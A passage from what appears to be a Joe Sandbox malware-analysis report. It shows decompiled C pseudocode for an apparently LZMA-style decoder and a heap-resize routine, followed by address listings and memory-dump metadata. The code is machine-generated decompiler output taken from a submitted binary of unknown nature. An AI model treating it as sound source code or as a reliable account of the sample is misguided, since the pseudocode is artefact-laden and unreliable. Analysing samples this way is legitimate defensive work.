				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t167 =  *((intOrPtr*)(_t351 + 0x14));
														_t344 =  *(_t351 + 0x28);
														_t128 = _t167 + 0x360; // 0x363
														_t206 = (_t298 << 7) + _t128;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}












































































                              0x004126b7
                              0x004126bd
                              0x004126c0
                              0x004126c3
                              0x004126c8
                              0x004126cb
                              0x004126de
                              0x004126e3
                              0x004126ec
                              0x004126f6
                              0x0041271e
                              0x00412723
                              0x0041272a
                              0x004128b6
                              0x004128ba
                              0x004128be
                              0x004128c0
                              0x004128ca
                              0x004128d4
                              0x004128f0
                              0x004128f5
                              0x004128fc
                              0x0041291b
                              0x0041291d
                              0x0041291f
                              0x00412927
                              0x00412935
                              0x00412951
                              0x00412956
                              0x00412959
                              0x0041295f
                              0x004129c8
                              0x004129cc
                              0x004129ce
                              0x004129d8
                              0x004129e2
                              0x004129fe
                              0x00412a03
                              0x00412a0a
                              0x00412a10
                              0x00412a18
                              0x00412a1a
                              0x00412a22
                              0x00412a3e
                              0x00412a43
                              0x00412a48
                              0x00000000
                              0x00412a4a
                              0x00412a4a
                              0x00412a4a
                              0x00000000
                              0x00412a24
                              0x00412a28
                              0x00000000
                              0x00412a2e
                              0x00412a34
                              0x00412a37
                              0x00412a3a
                              0x00000000
                              0x00412a3a
                              0x00412a28
                              0x00412a0c
                              0x00412a0c
                              0x00000000
                              0x00412a0c
                              0x004129e4
                              0x004129e8
                              0x00000000
                              0x004129ee
                              0x004129f4
                              0x004129f7
                              0x004129f9
                              0x004129fa
                              0x00000000
                              0x004129fa
                              0x004129e8
                              0x00412961
                              0x00412969
                              0x0041296d
                              0x00412971
                              0x00412979
                              0x00412997
                              0x0041299c
                              0x004129a1
                              0x00412a4e
                              0x00412a4e
                              0x00412a50
                              0x00412a52
                              0x00412a56
                              0x00412a5a
                              0x00412a62
                              0x00000000
                              0x004129a7
                              0x004129ad
                              0x004129c5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004129ad
                              0x0041297b
                              0x0041297f
                              0x00000000
                              0x00412985
                              0x00412988
                              0x00412990
                              0x00412992
                              0x00412993
                              0x00000000
                              0x00412993
                              0x0041297f
                              0x00412979
                              0x00412937
                              0x0041293b
                              0x00000000
                              0x00412941
                              0x00412947
                              0x0041294a
                              0x0041294d
                              0x00000000
                              0x0041294d
                              0x0041293b
                              0x004128fe
                              0x004128fe
                              0x00412900
                              0x00412908
                              0x0041290e
                              0x00412a68
                              0x00412a68
                              0x00412a71
                              0x00412a8d
                              0x00412a92
                              0x00412a95
                              0x00412a9b
                              0x00412ab1
                              0x00412ab5
                              0x00412ab7
                              0x00412abf
                              0x00412adb
                              0x00412ae0
                              0x00412ae5
                              0x00412afd
                              0x00412aff
                              0x00412b01
                              0x00412b07
                              0x00412b0c
                              0x00412ae7
                              0x00412ae9
                              0x00412aee
                              0x00412af0
                              0x00412af7
                              0x00412af7
                              0x00000000
                              0x00412ac1
                              0x00412ac5
                              0x00000000
                              0x00412acb
                              0x00412ad1
                              0x00412ad4
                              0x00412ad6
                              0x00412ad7
                              0x00000000
                              0x00412ad7
                              0x00412ac5
                              0x00412a9d
                              0x00412a9f
                              0x00412aa1
                              0x00412aa5
                              0x00412aa7
                              0x00412b14
                              0x00412b14
                              0x00000000
                              0x00412b20
                              0x00412b26
                              0x00412b42
                              0x00412b4b
                              0x00412b50
                              0x00412b58
                              0x00412b5a
                              0x00412b5c
                              0x00412b52
                              0x00412b52
                              0x00412b54
                              0x00412b54
                              0x00412b60
                              0x00412b66
                              0x00412b70
                              0x00412b77
                              0x00000000
                              0x00412b7d
                              0x00412b80
                              0x00412b82
                              0x00412b82
                              0x00412b87
                              0x00412b8b
                              0x00412b92
                              0x00412b92
                              0x00412b99
                              0x00412ba0
                              0x00412ba0
                              0x00412baa
                              0x00000000
                              0x00412bac
                              0x00412bb0
                              0x00000000
                              0x00412bb6
                              0x00412bbd
                              0x00412bc0
                              0x00412bc2
                              0x00000000
                              0x00412bc2
                              0x00412bb0
                              0x00000000
                              0x00412bc3
                              0x00412bc8
                              0x00412bcd
                              0x00412bd5
                              0x00412bd7
                              0x00412bd9
                              0x00412bcf
                              0x00412bcf
                              0x00412bd1
                              0x00412bd1
                              0x00412bdd
                              0x00412be2
                              0x00412be8
                              0x00000000
                              0x00412bee
                              0x00412bf2
                              0x00412bf6
                              0x00412c15
                              0x00412c19
                              0x00412c20
                              0x00412c26
                              0x00000000
                              0x00412c28
                              0x00412c2a
                              0x00000000
                              0x00412c30
                              0x00412c37
                              0x00412c3a
                              0x00412c3c
                              0x00000000
                              0x00412c3c
                              0x00412c2a
                              0x00000000
                              0x00412c3d
                              0x00412c3d
                              0x00412c49
                              0x00412c4b
                              0x00412c4b
                              0x00412c58
                              0x00412c5c
                              0x00000000
                              0x00412bf8
                              0x00412c0f
                              0x00412c61
                              0x00412c61
                              0x00412c70
                              0x00412c74
                              0x00412c7e
                              0x00000000
                              0x00412c80
                              0x00412c84
                              0x00000000
                              0x00412c8a
                              0x00412c91
                              0x00412c94
                              0x00412c96
                              0x00000000
                              0x00412c96
                              0x00412c84
                              0x00000000
                              0x00412c97
                              0x00412c9c
                              0x00412ca1
                              0x00412ca9
                              0x00412cab
                              0x00412cad
                              0x00412ca3
                              0x00412ca3
                              0x00412ca5
                              0x00412ca5
                              0x00412cb1
                              0x00412cb1
                              0x00000000
                              0x00412cb4
                              0x00412bf6
                              0x00412be8
                              0x00412b68
                              0x00412b68
                              0x00000000
                              0x00412b68
                              0x00412b28
                              0x00412b2c
                              0x00000000
                              0x00412b32
                              0x00412b38
                              0x00412b3b
                              0x00412b3e
                              0x00000000
                              0x00412b3e
                              0x00412b2c
                              0x00000000
                              0x00412b26
                              0x00412b20
                              0x00412a73
                              0x00412a77
                              0x00000000
                              0x00412a7d
                              0x00412a83
                              0x00412a86
                              0x00412a89
                              0x00000000
                              0x00412a89
                              0x00412a77
                              0x00412a71
                              0x004128d6
                              0x004128da
                              0x00000000
                              0x004128e0
                              0x004128e6
                              0x004128e9
                              0x004128eb
                              0x004128ec
                              0x00000000
                              0x004128ec
                              0x004128da
                              0x00412730
                              0x00412730
                              0x0041273f
                              0x00412743
                              0x0041274b
                              0x00412750
                              0x00412752
                              0x00412752
                              0x00412782
                              0x00412782
                              0x00412789
                              0x0041281c
                              0x0041281f
                              0x00412824
                              0x0041282b
                              0x00412826
                              0x00412826
                              0x00412826
                              0x00412834
                              0x00412838
                              0x0041283d
                              0x00412842
                              0x00412846
                              0x0041284a
                              0x0041284c
                              0x0041285a
                              0x00412864
                              0x00000000
                              0x00000000
                              0x00412866
                              0x0041286e
                              0x00000000
                              0x00412874
                              0x0041287a
                              0x0041287d
                              0x00412880
                              0x00000000
                              0x00412880
                              0x00000000
                              0x00412884
                              0x00412889
                              0x00412890
                              0x0041289a
                              0x0041289c
                              0x0041289e
                              0x00412892
                              0x00412892
                              0x00412894
                              0x00412896
                              0x00412896
                              0x004128a2
                              0x004128aa
                              0x00000000
                              0x004128b0
                              0x004128b0
                              0x00000000
                              0x004128b0
                              0x00000000
                              0x004128aa
                              0x0041278f
                              0x0041278f
                              0x004127a0
                              0x004127a4
                              0x004127ae
                              0x00000000
                              0x004127b0
                              0x004127b0
                              0x004127b8
                              0x00000000
                              0x004127be
                              0x004127c4
                              0x004127c7
                              0x004127ca
                              0x00000000
                              0x004127ca
                              0x004127b8
                              0x00000000
                              0x004127ce
                              0x004127d3
                              0x004127d8
                              0x004127e0
                              0x004127e2
                              0x004127e4
                              0x004127da
                              0x004127da
                              0x004127dc
                              0x004127dc
                              0x004127e8
                              0x004127f0
                              0x004127f0
                              0x004127f8
                              0x004127f8
                              0x004127fc
                              0x00412802
                              0x00412819
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00412802
                              0x00412789
                              0x004126f8
                              0x004126f8
                              0x00412700
                              0x00412714
                              0x00412717
                              0x0041271a
                              0x00000000
                              0x00412705
                              0x00412705
                              0x0041270b
                              0x0041270b
                              0x00412700
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction ID: 16771a17edc265a66ec67cf10f30b53a928448ec08439b5136306a35d4d76ba5
                              • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction Fuzzy Hash: 3D023C72A042114BD719CE18C6802BDBBE2FBD5350F150A3FE4A6D7684D7B898E8C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004162A6 Relevance: .3, Instructions: 259COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004162A6(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
